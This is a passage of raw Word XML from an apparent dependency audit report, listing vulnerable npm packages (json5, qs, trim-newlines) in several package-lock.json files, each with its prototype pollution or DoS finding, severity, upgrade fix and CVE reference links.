              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pollution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json sdk-infra/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="210" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"json5"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487605760">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>135572</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="55" name="Graphic 55"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="55" name="Graphic 55"/>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0.674998pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15710720;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape42" coordorigin="1440,213" coordsize="2880,0" path="m1440,213l4320,213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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId120">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/jsonwebtoken/8.5.1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId121">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>2564</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId122">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>3807</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId123">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-46175</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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020"/>
        <w:gridCol w:w="6620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1019" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="99"/>
              <w:ind w:right="3106" w:firstLine="593"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>1.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>json5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.2.3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2720" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="109"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId124">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>qs@6.5.2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="109"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prototype</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pollution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="693" w:right="1498" w:hanging="594"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"node_modules/request/node_modules/qs"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-25"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>6.5.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>qs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.11.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2740" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="115"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>trim-newlines@3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="115"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
              <w:ind w:right="3405"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json app-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="693" w:right="3106" w:hanging="594"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"node_modules/trim-newlines"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-25"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>3.0.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
